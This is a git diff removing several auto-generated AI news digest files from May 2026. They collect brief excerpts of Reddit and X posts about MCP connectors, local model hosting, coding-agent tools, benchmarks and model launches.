Found out Higgsfield supports MCP, connected it once, and now Claude generates video directly in chat. Setup is pretty simple. Settings → Connectors → Add custom → paste the MCP URL → sign into Higgsfield once. No API keys or extra setup. Once connected, I describe what I want and Claude handles model selection and rendering. The model variety surprised me. The connector gives access to 20+ video models through one chat: Sora 2, Veo 3.1, Kling 3.0, Seedance 2.0, MiniMax Hailuo, plus Higgsfield's own Soul Cinema and Cinema Studio. Claude picks one based on the prompt or I can choose manually. Real example from yesterday. Asked Claude for a cinematic shot of a soldier reading a letter. Claude picked Cinema Studio, set up cinematic mode, rendered it, and dropped the clip in chat. Maybe around 90 seconds total. Couple caveats: uses Higgsfield credits separately from your Claude sub, max 15 seconds per clip, starter credits for new accounts. The bigger win is workflow continuity. Production stays inside the same conversation where I'm researching and writing. Anyone else usi… - ---- - -## [Scoble: FDOT Launches 120 AI Companies At A Sold-Out San Francisco Event](https://x.com/Scobleizer/status/2057868124112982526) -*Aligned News (Scoble)* | 26/05/2026 | Score: 1.00 -Tags: product_launch, tool_update - -> Robert posted that FDOT launched 120 AI companies at a sold-out San Francisco event. 
- ---- - diff --git a/data/digest-2026-05-27.md b/data/digest-2026-05-27.md deleted file mode 100644 index b43798b..0000000 --- a/data/digest-2026-05-27.md +++ /dev/null @@ -1,123 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-27** | 15 stories | Auto-generated from 680 archived stories - ---- - -## [MarkdownAI v2.0, its a workflow engine, not a template parser](https://reddit.com/r/ClaudeAI/comments/1tpjmh3/markdownai_v20_its_a_workflow_engine_not_a/) -*Reddit r/ClaudeAI* | 27/05/2026 | Score: 1.00 -Tags: api_update, mcp, tool_update - -> MarkdownAI is a workflow and runbook engine for AI. Yes, it’s also a templating language, but that’s the least interesting thing about it. The power is the MCP server. Claude never sees a stale file again. Every document resolves live, every time. Simple example: your frontmatter. Status fields, version numbers, last-updated dates, owner, the stuff that’s wrong within a week of writing it. With MarkdownAI, frontmatter becomes live. Claude doesn’t read “status: in-progress” from three weeks ago. It reads the actual current state, fetched at render time. No staleness. No verification step. No “is this still true?” check that costs a tool call. That same idea scales to everything in the document, DB record counts, branch names, env values, test results, file trees. Anything that goes stale becomes live. **The grunt work problem** Before Claude does anything useful, it does housekeeping. Verify the branch. Check CI. Query the DB. Hit the health endpoint. Read env vars. Confirm the image exists. Check migrations. That’s a real pre-deployment runbook, and Claude is doing all of it, one tool call at a time. Each check is roughly 2 seconds of dead time plus a context interruption where Cl… - ---- - -## [I ran 8 open-weight models as agents in a persistent MMO for 10 days. 
Here's the 93k event dataset and some things that I learned](https://reddit.com/r/LocalLLaMA/comments/1tp6pg7/i_ran_8_openweight_models_as_agents_in_a/) -*Reddit r/LocalLLaMA* | 27/05/2026 | Score: 1.00 -Tags: api_update, open_source, developer_tool - -> Howdy everyone! Quick disclosure: I work on this - it's a project my studio created called the Null Epoch. I wasn't really happy with testing my agents with the usual static benchmarks and I wanted to learn more about how models and agents handle long-horizon planning, resource contention, and adversarial pressure over days or weeks in a more dynamic situation. I also have a particular fondness for the MUDs and text based RPGs I grew up on (really dating myself here), so the whole MMO and the open source SDK/TUI are kind of modeled after that experience. It functions as a persistent stress test (in MMORPG form!) where every "player" is an LLM agent. The first 10-day run (Season 0) used 25 agents across 8 open-weight models (Qwen3 235B & 32B, Nemotron 3 Nano 30B, Ministral 14B & 8B, Gemma 3 12B, GLM 4.7 Flash, etc.). I've published the dataset to HuggingFace (CC-BY-4.0). It's around 93,000 logged events and agent actions, and ~70% of the actions include the model's reasoning/justification for the action it took. I'm hoping to include the actual `<think>` reasoning traces in future datasets. **Link:** [FirespawnStudios/null-epoch-season-0-open](https://huggingface.co/d… - ---- - -## [Found a Rust TUI coding agent that aggressively trims context with AST-level chunking. Cut my token bleed sharply with DeepSeek V4 Flash.](https://reddit.com/r/LocalLLaMA/comments/1tp0a5e/found_a_rust_tui_coding_agent_that_aggressively/) -*Reddit r/LocalLLaMA* | 27/05/2026 | Score: 1.00 -Tags: api_update, open_source, agent_tool - -> been hunting for a coding agent that doesn't dump my entire directory tree into every prompt. found vtcode on github — open-source rust tui, surprisingly aggressive on context management. 
what makes it different from the usual agent frameworks: most shovel the whole codebase context into prompts and burn tokens fast. vtcode goes the opposite way — explicit token budget tracking plus ast-level context extraction via ripgrep + ast-grep. only the structurally relevant code chunks get sent to the model. on my refactor tasks the prompt size dropped sharply. sandboxing isn't an afterthought either. macos seatbelt + linux landlock + seccomp + tree-sitter-bash validation on every model-generated command. the agent stays in your workspace, doesn't roam. paired it with deepseek v4 flash since the public endpoint throttles during peak dev hours. better latency through a third-party endpoint. vtcode natively supports openai-compatible custom providers so plugging in is a single config block: [ agent ] provider = "atlas" default_model = "deepseek-ai/deepseek-v4-flash" [[ custom_providers ]] name = "atlas" base_url = "https://api.atlascloud.ai/v1" api_key_env = "ATLAS_API_KEY" model = "deepseek… - ---- - -## [I built a tool that lets your AI assistant test your entire app in a real browser](https://reddit.com/r/ClaudeAI/comments/1tostnb/i_built_a_tool_that_lets_your_ai_assistant_test/) -*Reddit r/ClaudeAI* | 27/05/2026 | Score: 0.94 -Tags: mcp, open_source, developer_tool - -> So i've been working on this thing called Vibe Testing for a while now and finally putting it out there. Basically it's an MCP server that plugs into Claude Code, Cursor, Windsurf etc. you tell your AI assistant "test the login flow" and it actually does it, reads your source code to understand real selectors and routes, opens a real Playwright browser, clicks through stuff, takes screenshots, and tells you what broke. No test files to write or maintain. it figures out your framework, your routes, your forms from the codebase itself. it even remembers what worked and what was flaky between runs so it gets better over time. 
12 tools total, scanning your codebase, exploring pages, executing test scenarios, generating reports, the whole thing. Setup is one command: npx vibe-testing@latest init it auto-detects your editors and configures everything. it's fully open source, would love feedback or contributions: [https://github.com/AishwaryShrivastav/vibe-testing](https://github.com/AishwaryShrivastav/vibe-testing) [https://www.npmjs.com/package/vibe-testing](https://www.npmjs.com/package/vibe-testing) - ---- - -## [Anthropic just confirmed why 90% of non-coding AI agents fail in production](https://reddit.com/r/ClaudeAI/comments/1tph5u4/anthropic_just_confirmed_why_90_of_noncoding_ai/) -*Reddit r/ClaudeAI* | 27/05/2026 | Score: 1.00 -Tags: api_update, agent_tool - -> Anthropic recently published an incredibly deep breakdown analyzing millions of real human-agent tool calls across their public API, and they shared a breakdown of where these agents are being deployed. They said “Software engineering makes up roughly 50% of all agentic activity on their platform”. Everything else: sales, marketing, finance, legal is sitting down in the single digits. A lot of the initial commentary around this has been along the lines of: *"Oh, look, AI agents only work for coding. They haven't cracked the rest of the enterprise yet."* But if you’ve tried to build and deploy an autonomous agent in a non-coding environment, you know that is the wrong conclusion. The models are more than capable but the real problem is that software engineering data is clean, while real-world business data is a horrific and unorganized. Think about it: * Why Coding is Easy for Agents: Code lives in structured Git repo. It follows strict syntax rules, has clear docs and runs inside deterministic terminals. If an agent breaks something, the compiler throws a clean error message telling it exactly what went wrong. 
* Why the Rest of the World is Hard: A sales or marketing agent doesn’t… - ---- - -## [[R] What 1000+ Harness Experiments Taught Me About Self-Improving Agents [R]](https://reddit.com/r/MachineLearning/comments/1tpbp7m/r_what_1000_harness_experiments_taught_me_about/) -*Reddit r/MachineLearning* | 27/05/2026 | Score: 1.00 -Tags: cli_tool, agent_tool - -> I recently wanted to see whether an AI agent could self-improve a harness to solve terminal bench tasks. It’s possible for an AI agent to propose a meaningful one-time change to the harness, but after experimenting with this for a couple of weeks, I think the continuous self-improvement is mostly an experiment-systems problem. The system needs a way to decide what kind of improvements can safely compound. Turns out there's a lot of parallels to coding-agent customization (e.g. SKILLS.md etc..) too. I wrote my experience of building such system here, including the successful and failure attempts during the process, and how I approached the self-improvement loop. It's not intended as a benchmark claim but more of a systems/research writeup. [https://www.henrypan.com/blog/2026-05-25-self-improvement-harness/](https://www.henrypan.com/blog/2026-05-25-self-improvement-harness/) - ---- - -## [Nvidia H100(94GB VRAM) - should I run llama.cpp or vllm for 30 users inference?](https://reddit.com/r/LocalLLaMA/comments/1tp7znr/nvidia_h10094gb_vram_should_i_run_llamacpp_or/) -*Reddit r/LocalLLaMA* | 27/05/2026 | Score: 1.00 -Tags: api_update, agent_tool - -> I was given the great opportunity to borrow a H100 with 94GB VRAM at work until it is needed by a customer. (No idea how much system ram I will get, but I guess they are a bit flexible on this). \- I want to build a inference endpoint that can handle up to 30 users. \- I want a fairly reasonable big context, say 131,072-262,144. \- I think in most situations, realistically speaking, not more than 10-15 users will use it concurrently. 
\- Main use for this will be tools like Pi and OpenCode. Was thinking to use Qwen3.6-27B unless anyone can recommend a better one for agentic coding given the constrains. \- Should I use vllm or llama.cpp? Will llama.cpp able to handle the concurrency? \- If running on llama.cpp I would probably use UD-Q6\_K\_XL or UD-Q8\_K\_XL quant from Unsloth. \- If running on vllm I have no idea on what quant to use? Some advice here would be great. \- Is there any good tool to benchmark "concurrent users"? - ---- - -## [litellm vs any-llm (otari)](https://reddit.com/r/LocalLLaMA/comments/1tp6p5j/litellm_vs_anyllm_otari/) -*Reddit r/LocalLLaMA* | 27/05/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> I am considering switching from litellm (sdk) to Mozilla’s [any-llm.](https://github.com/mozilla-ai/any-llm) They also have a proxy to go with it called [otari.](https://github.com/mozilla-ai/otari) On the face of it the repos looks a lot more well kept and stable (had a lot of issues with litellm before). Was wondering if others have already done similar and have positive or negative experiences - ---- - -## [Beating the $100 SDK Credit Cap: Parallel Orchestration and Extended Timeouts in Agent Fleets](https://reddit.com/r/ClaudeAI/comments/1tp1476/beating_the_100_sdk_credit_cap_parallel/) -*Reddit r/ClaudeAI* | 27/05/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> Anthropic’s impending shift to meter programmatic Agent SDK and `claude -p` usage under a rigid monthly credit allowance means developers have to start engineering for extreme token frugality and runtime efficiency. If your workflow engine blocks your entire system every time an agent runs a long file modification, your operational costs and development velocity take a massive hit. 
Flotilla v0.5.0 completely overhauls its background execution engine to maximize Claude's heavy-lifting potential while shielding your wallet from continuous credit drains: * **Non-Blocking Parallel Loops (v5)**: As mapped out in the blueprint, we swapped out sequential, blocking subprocess calls for an asynchronous process group manager tracking active workflows concurrently via non-blocking `Popen` execution. * **The 30-Minute Claude Safe-Window**: Complex multi-file engineering steps or Claude Code sessions frequently get choked out by standard tool limits. We replaced uniform global process constraints with an explicit per-agent map, extending Claude's runtime allowance to 1800s (30 minutes) to entirely eliminate `SIGTERM` / exit 143 mid-task terminations. * **Smart Local Delegation**: To keep you c… - ---- - -## [Claude Code has zero idea what your codebase looks like structurally (Open source with benchmarks)](https://reddit.com/r/ClaudeAI/comments/1tpbjwo/claude_code_has_zero_idea_what_your_codebase/) -*Reddit r/ClaudeAI* | 27/05/2026 | Score: 0.78 -Tags: mcp, open_source - -> Every time I watch someone use Claude Code on a real codebase, the same thing happens. It rewrites a module that three other modules depend on without any awareness of coupling. It just reads the file, makes changes, moves on It reads files one at a time without any map. Doesn't know which files are coupled. Doesn't know who owns what. Doesn't know why that weird pattern in the auth module exists on purpose. I've been building an open source MCP layer to fix this called repowise. Self-hosted, pip install, AGPL-3.0. Five context layers that sit between your codebase and the model: Graph - AST-based dependency graph. Knows what depends on what before it touches anything. Git - Hotspots, ownership, co-change patterns, bus factor. "This file always changes with these three other files. Docs - Auto-generated wiki from your code. Searchable. Decisions - Captures architectural intent. 
Why the code is shaped the way it is. Stops the model from "fixing" things that were intentional. Code Health - 12 biomarkers per file. Complexity, duplication, untested hotspots, declining trends. Zero LLM, pure static analysis. We ran a time-travel experiment on Django (542 files): scored every file, then… - ---- - -## [Millions of AI agents imperiled by critical vulnerability in open source package](https://arstechnica.com/information-technology/2026/05/millions-of-ai-agents-imperiled-by-critical-vulnerability-in-open-source-package/) -*Ars Technica AI* | Score: 0.74 -Tags: open_source, developer_tool - ---- - -## [CrankGPT by Squeez Labs - hand-cranked edge AI - talk about local AI!!!](https://reddit.com/r/LocalLLaMA/comments/1tpm7m3/crankgpt_by_squeez_labs_handcranked_edge_ai_talk/) -*Reddit r/LocalLLaMA* | 28/05/2026 | Score: 1.00 -Tags: tool_update - -> I met Katrin from Squeez Labs at an event hosted by Pathway AI (the team behind Baby Dragon Hatchling) where she told me about CrankGPT, a literally hand-cranked device for running local LLMs. It's apparently real. It's appearently launched. It's apparently glorious. Check it out at [https://crankgpt.com/](https://crankgpt.com/) \- if anyone from Squeez Labs posts here and I'm stealing their thunder, I'll take the post down! But I've been really excited about this. So local you gotta squeez it with yer own armz. ;) [https://www.youtube.com/watch?v=HSapdLYpmWY](https://www.youtube.com/watch?v=HSapdLYpmWY) - ---- - -## [BEAM 100K memory benchmark: CSM vs Hindsight local artifact comparison [R]](https://reddit.com/r/MachineLearning/comments/1tpjx2m/beam_100k_memory_benchmark_csm_vs_hindsight_local/) -*Reddit r/MachineLearning* | 27/05/2026 | Score: 1.00 -Tags: open_source - -> \[R\] BEAM 100K memory benchmark: CSM vs Hindsight local artifact comparison I’m looking for feedback on a local agent-memory benchmark comparison, especially from people who care about evaluation methodology. 
I built an open-source R&D memory system called Context Swarm Memory (CSM). It uses bounded read-only memory shards, query routing, probe/recall/synthesis, cited packets, and explicit Committer-gated writes. The current comparison is against the accepted local Hindsight artifact on BEAM 100K: * CSM: 0.757573 AMB score, 342 / 400 correct * Hindsight: 0.733658 AMB score, 326 / 400 correct * CSM uses 38.2% fewer answer-visible context tokens * CSM is slower: 29.23s average retrieval vs 6.38s I want to be precise about the claim: This is not an official leaderboard claim. It is not a BEAM 10M claim. It is a committed local accepted-artifact comparison at 100K, and the next step should be independent replication or official chart acceptance. Repo: [https://github.com/muhamadjawdatsalemalakoum/context-swarm-memory](https://github.com/muhamadjawdatsalemalakoum/context-swarm-memory) Evidence and reproducibility notes: [https://muhamadjawdatsalemalakoum.github.io/context-swarm-me… - ---- - -## [Running real-time 1080p video generation and editing on your own (Dreamverse OSS release)](https://reddit.com/r/StableDiffusion/comments/1tpfbrl/running_realtime_1080p_video_generation_and/) -*Reddit r/StableDiffusion* | 27/05/2026 | Score: 1.00 -Tags: open_source - -> Hi guys, FastVideo team here again. Following up on our[ Dreamverse post](https://haoailab.com/blogs/dreamverse/), today we finally cleaned our code up and are excited to say that it's open source! Both the backend and frontend are out, so you can self-host the whole thing. B200s aren't exactly consumer hardware (we know), so the easiest path is to rent one from a cloud GPU provider. Once you've got access, spin up the server and start editing videos in your browser. There's also a mock backend in the repo if you want to hack on the UI without touching a GPU. 
The release covers the browser workspace, Python runtime for sessions and worker management, fMP4 streaming over websocket, prompt rewriting with safety filters, plus Docker images. The idea is that it can also serve as a sample architecture for anyone building their own real-time video gen apps. One more thing before you go. On the RTX 5090 side, we've gotten Wan2.1 1.3B running in under 2s on a single 5090, and we're working on integrating it into Dreamverse so y'all don't need a B200 to play with this. More on that soon :) Repo: [https://github.com/hao-ai-lab/FastVideo/tree/main/apps/dreamverse](https://github.com/hao-ai-l… - ---- - -## [Qwen3.6 huge quality gain from Q4 to Q6 for coding agent](https://reddit.com/r/LocalLLaMA/comments/1tpebhw/qwen36_huge_quality_gain_from_q4_to_q6_for_coding/) -*Reddit r/LocalLLaMA* | 27/05/2026 | Score: 1.00 -Tags: agent_tool - -> So, last week I tried to update my unused local LLM setup. I had to stop using it because quality was too low and deepseek was too cheap. First thing I stopped using Ollama and now I only use llama.cpp built in server that works really great. The quality improvement from Q4 to Q6 is outstanding and finally a local LLM server can work very similarly to paid APIs. That's great! And MTP makes a big performance gain, on a dual 3090 (downvolted and limited to 65°C) it generates from 20 to 50 tokens per second with minimal heat generation. So yes, that time has finally arrived! 
Local coding agents are a thing and they work 😎 - ---- - diff --git a/data/digest-2026-05-28.md b/data/digest-2026-05-28.md deleted file mode 100644 index 83ddda6..0000000 --- a/data/digest-2026-05-28.md +++ /dev/null @@ -1,121 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-28** | 15 stories | Auto-generated from 714 archived stories - ---- - -## [Claude Code 2.1.153 Open Changelog Reflects Anthropic's Transparent Developer Tooling Strategy](https://x.com/ClaudeCodeLog/status/2059802880811434228) -*Aligned News (Scoble)* | 28/05/2026 | Score: 1.00 -Tags: cli_tool, tool_update, agent_tool - -> Anthropic's commitment to publishing detailed Claude Code changelogs with every release enables developers to track improvements and plan migrations. Version 2.1.153 with 36 CLI changes reflects rapid iteration in the agentic coding space. - ---- - -## [I built and open-sourced Skill Index to organize & standardize your AI agent knowledge across Claude, Codex, Cursor, and more. 100% local and free on macOS.](https://reddit.com/r/ClaudeAI/comments/1tprx27/i_built_and_opensourced_skill_index_to_organize/) -*Reddit r/ClaudeAI* | 28/05/2026 | Score: 1.00 -Tags: mcp, open_source, agent_tool - -> I’ve been using Claude alongside other coding agents, and I kept running into the same problem: useful skills, MCPs, commands, hooks, and workflows start getting scattered across different tools. Sometimes Claude has the best version of something. Sometimes Codex or Cursor does. Sometimes an MCP is configured in one agent but missing or slightly different in another. Over time, it gets harder to treat your agent knowledge as one reusable system. So I built Skill Index: a free, open-source, 100% local macOS app for organizing and standardizing AI agent knowledge. The goal is to make it easier to bring reusable skills/MCPs/agent knowledge into Claude, while also keeping Claude’s own knowledge portable across the rest of your setup. 
It can help you: \- see where your skills and MCPs live \- compare what Claude, Codex, Cursor, Windsurf, and other agents can access \- standardize around a canonical definition of each skill/MCP \- keep your skills and MCPs in sync across every agent It’s local-first: no accounts, no cloud sync, no telemetry. Website: [https://skillindex.app](https://skillindex.app) GitHub: [https://github.com/arjitj2/skillindex](https://github.com/arjitj2/skillindex) - ---- - -## [MCP Servers / Connectors in Claude Desktop / Cowork via AWS Bedrock](https://reddit.com/r/ClaudeAI/comments/1tpxskx/mcp_servers_connectors_in_claude_desktop_cowork/) -*Reddit r/ClaudeAI* | 28/05/2026 | Score: 0.78 -Tags: mcp, developer_tool, cli_tool - -> While using MCP servers in the code CLI works with MCP servers, I'm having trouble using connectors or MCP servers in Cowork. Connecting to Jira or O365 seems not possible. With Bedrock, we don't have the Chat, but only the Cowork tab and also some additional settings are missing. I tried configuring the claude\_desktop\_config.json with MCP servers, but cowork doesn't seem to be able to use it. I can Import a manual plugin, but after a restart it seems gone and configuring it in cowork is not possible, the authentication doesn't work. Did anyone manage to get Connectors / MCP Servers / Plugins in Claude Desktop with Bedrock to work, and if so, how? - ---- - -## [Introducing Claude Opus 4.8](https://reddit.com/r/ClaudeAI/comments/1tq99mu/introducing_claude_opus_48/) -*Reddit r/ClaudeAI* | 28/05/2026 | Score: 1.00 -Tags: github_release, tool_update - -> We’re upgrading Claude Opus to a new version: Claude Opus 4.8. It builds on Opus 4.7 with sharper judgment, more honesty about its own progress, and the ability to work independently for longer than its predecessors. Available today for the same price. In Claude Code, you can hand off a feature, a migration, or a bug sweep and let it follow the work through while you focus on what’s next. 
Also launching today: * Fast mode for Opus 4.8 (research preview). Same model at roughly 2.5x the speed, now three times cheaper than before. * Dynamic workflows in Claude Code (research preview). Claude runs hundreds of parallel subagents in a single session and verifies its work before reporting back. * A new effort control on [claude.ai](http://claude.ai), so you can choose how much thinking Claude puts into a response. Claude Opus 4.8 is live today on [claude.ai](http://claude.ai), the Claude Platform, and all major cloud platforms. Read more: [anthropic.com/news/claude-opus-4-8](http://anthropic.com/news/claude-opus-4-8) - ---- - -## [I built an enforcement layer for AI coding agents using a local knowledge graph and hybrid RAG](https://reddit.com/r/LocalLLaMA/comments/1tq6sd0/i_built_an_enforcement_layer_for_ai_coding_agents/) -*Reddit r/LocalLLaMA* | 28/05/2026 | Score: 1.00 -Tags: api_update, agent_tool - -> I know this sub is focused on local models but the architecture behind this applies to any LLM-powered coding agent, not just Claude Code. The problem: when you give a coding agent a large set of rules and standards, two things break. The context fills up with rules that aren't relevant to the current task, and nothing enforces compliance. The agent reads your instructions and decides what to follow. I built Writ to solve both. The knowledge layer: rules, skills, techniques, antipatterns, and playbooks live as nodes in a Neo4j knowledge graph with typed relationships between them. A five stage retrieval pipeline (BM25 over Tantivy, vector similarity over HNSW with a local ONNX embedding model, graph traversal, reciprocal rank fusion, context budget management) retrieves only what's relevant per task. Everything runs locally. No API calls for retrieval. The embedding model (all-MiniLM-L6-v2) runs through ONNX runtime, not PyTorch, so inference is fast without a GPU. The enforcement layer: 30 bash hook scripts intercept tool calls before execution. 
The agent can't write code without an approved plan, can't skip tests, can't say "tests pass" without running static analysis. These are… - ---- - -## [Kept context-switching between arxiv, OpenReview, GitHub, and HuggingFace for every paper, so I built this. Chrome extension + website with everything inline, plus citation graph + SPECTER2 neighbors. 3M papers, free, feedback welcome [P]](https://reddit.com/r/MachineLearning/comments/1tq53il/kept_contextswitching_between_arxiv_openreview/) -*Reddit r/MachineLearning* | 28/05/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> Spent the last few months building a deeper context layer over arxiv. Each paper gets a Tomesphere page with a TLDR + key findings (LLM-curated), OpenReview reviews where the venue is public, linked GitHub repos, HuggingFace models, conference videos, the citation graph in both directions, and a SPECTER2-based semantic neighbor graph. Same panel renders inline on arxiv via a Chrome extension (MV3 side panel API), or you can browse directly at tomesphere.com. 3M arxiv papers indexed. Caveats: reviewer scores only cover venues that publish openly on OpenReview (NeurIPS, ICLR, ICML, TMLR, COLM). Blind-review venues like CVPR, AAAI, ECCV are out of scope until contributors fill them in. GitHub, Hugging Face, and conference video matches are best-effort. Free, no signup. Site: [tomesphere.com](http://tomesphere.com/) Chrome: [chromewebstore.google.com/detail/tomesphere/nopoigoclhjcopjppnehidnkljmabllk](https://chromewebstore.google.com/detail/tomesphere/nopoigoclhjcopjppnehidnkljmabllk) Would love feedback, especially: which paper did you check first, and what's missing that you'd actually use? - ---- - -## [Built a richer reading layer for arxiv (Chrome extension + web): OpenReview reviews, GitHub/HuggingFace links, citation graph, SPECTER2 neighbors, TLDRs. 
3M papers, free, looking for feedback [P]](https://reddit.com/r/MachineLearning/comments/1tq31yu/built_a_richer_reading_layer_for_arxiv_chrome/) -*Reddit r/MachineLearning* | 28/05/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> Spent the last few months building a deeper context layer over arxiv. Each paper gets a Tomesphere page with a TLDR + key findings (LLM-curated), OpenReview reviews where the venue is public, linked GitHub repos, HuggingFace models, conference videos, the citation graph in both directions, and a SPECTER2-based semantic neighbor graph. Same panel renders inline on arxiv via a Chrome extension (MV3 side panel API), or you can browse directly at tomesphere.com. 3M arxiv papers indexed. Caveats: reviewer scores only cover venues that publish openly on OpenReview (NeurIPS, ICLR, ICML, TMLR, COLM). Blind-review venues like CVPR, AAAI, ECCV are out of scope until contributors fill them in. GitHub, Hugging Face, and conference video matches are best-effort. Free, no signup. Site: [tomesphere.com](http://tomesphere.com) Chrome: [chromewebstore.google.com/detail/tomesphere/nopoigoclhjcopjppnehidnkljmabllk](https://chromewebstore.google.com/detail/tomesphere/nopoigoclhjcopjppnehidnkljmabllk) Would love feedback, especially: which paper did you check first, and what's missing that you'd actually use? - ---- - -## [SDXL image generation now works on iPhone. The bug that blocked it for months was a missing file check](https://reddit.com/r/StableDiffusion/comments/1tq302b/sdxl_image_generation_now_works_on_iphone_the_bug/) -*Reddit r/StableDiffusion* | 28/05/2026 | Score: 1.00 -Tags: open_source, developer_tool - -> We've been building \[Off Grid\](https://github.com/alichherawalla/off-grid-mobile-ai) - open-source app for on-device AI (text + image gen, no cloud). SDXL on iPhone was broken for months. Users kept reporting it, we couldn't reproduce it consistently. 
Turns out: SDXL models ship in two UNet layouts: \- Monolithic: one big \`Unet.mlmodelc\` file \- Chunked: \`UnetChunk1.mlmodelc\` + \`UnetChunk2.mlmodelc\` Our validation code only checked for the monolithic layout. If you downloaded a chunked SDXL model (which most are), the app said "model invalid" and refused to load it. Months of reports. The fix was adding the chunked layout check — straightforward once we understood the problem. The app uses Apple's ml-stable-diffusion framework with CoreML. On an iPhone 15 Pro, you get SDXL images in about 30-45 seconds fully on-device. No internet needed at any point - the model lives on your phone. It's free and open source: \- GitHub: [https://github.com/alichherawalla/off-grid-mobile-ai](https://github.com/alichherawalla/off-grid-mobile-ai) \- iOS: [https://apps.apple.com/us/app/off-grid-local-ai/id6759299882](https://apps.apple.com/us/app/off-grid-local-ai/id6759299882) \- Android (SD… - ---- - -## [DSPy v3.3.0 Beta Brings ReActV2 to Open-Source AI Programming Framework](https://x.com/isaacbmiller1/status/2059828079371894786) -*Aligned News (Scoble)* | 28/05/2026 | Score: 1.00 -Tags: open_source, developer_tool - -> Stanford's DSPy framework released v3.3.0 beta on PyPI with ReActV2, improved LM/BaseLM architecture, and RLM data-passing support. DSPy is widely used for structured programming with language models in both research and production. - ---- - -## [Tencent WorkBuddy Global Launch Brings China's Top Desktop AI Agent to International Markets](https://x.com/TencentAI_News/status/2059827192964808922) -*Aligned News (Scoble)* | 28/05/2026 | Score: 1.00 -Tags: product_launch, agent_tool - -> Tencent's WorkBuddy desktop AI agent — already China's market leader — launches worldwide with autonomous handling of coding, analysis, and productivity tasks. The global launch challenges Microsoft Copilot, Cursor, and other Western enterprise AI assistants on their home turf. 
- ---- - -## [Local run for multi users: which software set?](https://reddit.com/r/LocalLLaMA/comments/1tq0cj7/local_run_for_multi_users_which_software_set/) -*Reddit r/LocalLLaMA* | 28/05/2026 | Score: 1.00 -Tags: api_update, open_source - -> Context: I am testing and running local LLM on Linux for some months, first with llama.cpp and now with vLLM for better concurrent capabilities. I use llama-swap in front of either vLLM or llama.cpp in order to have thinking and non-thinking variants exposed with all inference parameters adjusted according to the model requirements. My needs: now, I would like to make the LLM available to multiple (less than 10) users, outside from the local network: https access, web chat interface with either connection or api-key, API access with api-key. What I tried: * apache as frontend proxy: handle SSL part and redirect to internal applications as unsecured connections. * LibreChat as web user interface * llama-swap * vLLM Observed problems: * concurrency is limited to 10 requests (llama-swap limitation, either find how to raise this value or good alternative) * LibreChat only gives web interface, still need API access with keys management. Which open source software set do you use to serve multiple users? Do you know simple keys management tools? Did I miss something? Thank for any help! 
- ---- - -## [OpenAI releases secure tunnels to connect private Model Context Protocol servers without modifying inbound firewallsOutbound-only HTTPS tunnels secure the connection to OpenAI.](https://www.digg.com/ai/28n5w7d2) -*Digg AI* | Score: 1.00 -Tags: mcp, product_launch - ---- - -## [Genesis AI launches Genesis World 1.0, an open-source robotics simulator that turns one hour of real-world testing into 100 simulation daysIt features GPU-accelerated physics solvers and path-traced rendering](https://www.digg.com/ai/tuo1sird) -*Digg AI* | Score: 1.00 -Tags: product_launch, open_source - ---- - -## [Vulnerability found in framework used by VLLM, many MCP servers, and other LLM tools](https://reddit.com/r/LocalLLaMA/comments/1tpp2th/vulnerability_found_in_framework_used_by_vllm/) -*Reddit r/LocalLLaMA* | 28/05/2026 | Score: 1.00 -Tags: mcp, developer_tool - -> Worth taking a look to see if this affects any of you. Surprised nobody has posted it yet. - ---- - -## [GH200 NVL2 or 8x RTX 6000 Blackwell for running Kimi K2.6 / DeepSeek V4 locally? (5 devs, agentic coding)](https://reddit.com/r/LocalLLaMA/comments/1tpp0a7/gh200_nvl2_or_8x_rtx_6000_blackwell_for_running/) -*Reddit r/LocalLLaMA* | 28/05/2026 | Score: 1.00 -Tags: api_update, agent_tool - -> Trying to figure out the right box for my team and wanted to see if anyone had any clue which would be a better fit or if it is not worth our time in our budget. Situation: 5 of us doing agentic coding (lots of long context getting re-sent every turn, parallel tool calls, etc.) and we want to self-host the latest open MoE models — Kimi K2.6 and DeepSeek V4 class. My boss likes the idea of having it in house so no point in just saying pay the API (I did pitch that) Budget is around $100k - $150k. I'm stuck between a dual GH200 NVL2 (cheaper, \~1.2TB unified memory) (about 95k) and an 8x RTX 6000 Pro Blackwell build (768GB of actual fast VRAM, more expensive) (about 140k). 
To get real numbers I rented a single GH200 and tested Kimi K2.6 at a 2-bit quant. After some playing around I got it up to \~23 tok/s decode, which is not bad considering it is one GH200 with only 96gb of HBM, but I am not sure how it will scale to the dual GH200. The prefill was pretty slow yet again not sure how it will scale. The thing I keep coming back to: these models are too big to fit in HBM no matter what. Even the NVL2's 288GB HBM3e can't hold them, so the model partially lives in the slower unified mem… - ---- - diff --git a/data/digest-2026-05-29.md b/data/digest-2026-05-29.md deleted file mode 100644 index bbd25dd..0000000 --- a/data/digest-2026-05-29.md +++ /dev/null @@ -1,111 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-29** | 15 stories | Auto-generated from 468 archived stories - ---- - -## [Runway Exposes Gen-4.5, Kling, and GPT Image 2 via MCP — Creative Models Now Callable Inside Claude, Cursor, and Replit Agents](https://x.com/runtimewire/status/2059782827927810437) -*Aligned News (Scoble)* | 29/05/2026 | Score: 1.00 -Tags: mcp, tool_update, agent_tool - -> Runway plugged its creative model suite into Claude, ChatGPT, Cursor, and Replit via MCP, making image and video generation callable directly inside AI agent workflows. Runway Gen-4.5, Kling, and GPT Image 2 are all exposed through the integration. - ---- - -## [Kling AI Skill Launches for Agent Workflows — Text-to-Video, 4K Images, and Cross-Scene Consistency in Claude and Cursor](https://x.com/MayorKingAI/status/2044455291664695688) -*Aligned News (Scoble)* | 29/05/2026 | Score: 1.00 -Tags: product_launch, tool_update, agent_tool - -> Kling AI launched a dedicated Skill for AI agent workflows, enabling text/image to video generation, 4K image generation, style transfer, and cross-scene consistency with custom elements. Works natively with Claude, Cursor, Copilot, Codex, and OpenClaw. 
